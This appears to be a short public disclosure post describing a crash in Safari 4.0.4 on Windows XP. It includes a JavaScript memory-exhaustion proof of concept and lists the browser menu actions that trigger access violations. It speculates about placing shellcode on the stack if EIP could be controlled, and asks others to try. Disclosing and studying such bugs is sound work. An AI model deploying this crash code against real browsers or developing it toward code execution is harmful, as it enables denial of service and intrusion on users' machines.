Safari 4.0.4 Crash

The following piece of javascript will crash Safari nicely when triggered using one \ of the methods described below. With my limited knowledge I am unable to tell if \ it's exploitable or not. I therefore turn it over to "the internet". (tested on \ Safari 4.0.4, Win XP Pro SP3) ============================ <script> var data = "A"; while(data.length<0x40000){ data += data; } data2 = new Array(); for (x=0; x<4000; x++){ data2[x] = data+data; } </script> ============================ The crash is not immediate, but there are actually two ways to trigger it and I \ believe they are separate problems. The following will cause Safari to crash with “Access violation reading [00000000]”. * Window->Activity Whereas these will crash Safari with “Access violation writing to [BBADBEEF]” * Develop->Start Debugging Javascript * Develop->Show Error Console (Unreliable) * Develop->Show Web Inspector (Unreliable) * (Right Click)->Inspect Element I can’t seem to affect any registers in an advantageous way but I do see several \ pointers to \x41 blocks on the stack. At least you could put shellcode in these and \ jump to them if you could control EIP. If anyone is able to do anything with this, \ please let me know.